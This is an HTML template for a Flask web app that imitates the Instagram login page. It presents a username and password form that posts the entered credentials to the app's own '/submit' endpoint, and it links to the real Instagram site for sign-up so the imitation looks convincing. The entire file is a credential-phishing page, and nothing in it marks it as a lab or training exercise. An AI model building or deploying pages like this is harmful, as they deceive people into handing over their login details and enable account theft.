<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram</title>
    <link rel="stylesheet" href="{{ url_for('static', filename='instyle.css') }}">
</head>
<body>
    <div class="login-container">
        <h1>Instagram</h1>
        <form action="/submit" method="POST">
            <input type="text" name="username" placeholder="Phone number, username, or email" required>
            <input type="password" name="password" placeholder="Password" required>
            <button type="submit">Log In</button>
        </form>
        <p>Don't have an account? <a href="https://www.instagram.com/">Sign up</a></p>
    </div>
</body>
</html>
